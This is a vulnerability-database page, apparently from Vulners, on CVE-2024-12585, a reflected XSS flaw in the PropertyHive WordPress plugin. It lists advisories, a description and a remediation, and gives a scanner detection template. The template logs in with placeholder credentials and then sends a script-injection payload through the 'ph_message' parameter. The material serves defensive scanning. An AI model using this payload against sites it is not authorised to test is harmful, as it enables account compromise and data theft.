| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2024-12585 | 8 Jan 202506:09 | – | circl | |
| WordPress plugin PropertyHive 安全漏洞 | 8 Jan 202500:00 | – | cnnvd | |
| CVE-2024-12585 | 8 Jan 202506:00 | – | cve | |
| CVE-2024-12585 PropertyHive < 2.1.1 - Reflected XSS | 8 Jan 202506:00 | – | cvelist | |
| EUVD-2024-50976 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-12585 | 8 Jan 202506:15 | – | nvd | |
| CVE-2024-12585 | 8 Jan 202506:15 | – | osv | |
| WordPress PropertyHive plugin < 2.1.1 - Reflected XSS vulnerability | 8 Jan 202507:07 | – | patchstack | |
| PT-2025-1901 | 8 Jan 202500:00 | – | ptsecurity | |
| CVE-2024-12585 | 23 May 202508:03 | – | redhatcve |
id: CVE-2024-12585
info:
name: PropertyHive < 2.1.1 - Cross-Site Scripting
author: Shivam Kamboj
severity: medium
description: |
The Property Hive plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'ph_message' parameter in all versions up to, and including, 2.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
impact: |
Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
remediation: |
Update to version 2.1.1 or later where input sanitization and escaping are properly implemented.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/propertyhive/property-hive-210-reflected-cross-site-scripting
- https://nvd.nist.gov/vuln/detail/CVE-2024-12585
metadata:
verified: true
max-request: 2
tags: cve,cve2024,wordpress,wp,wp-plugin,propertyhive,xss,authenticated
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(header, "wordpress_logged_in")'
condition: and
internal: true
- raw:
- |
GET /wp-admin/admin.php?page=ph-settings&ph_message="><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "<script>alert(document.domain)</script>", "ph_message", "property-hive_page_ph-settings")'
condition: and
# digest: 4a0a0047304502204d1bcd5d3f3b74ba11ed7f5eb6a017267457b8fa92084df39938c89640970106022100c71cae0587ac065e0fea5348da51db4aa9aef3f35a01b3cea257accd14444579:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation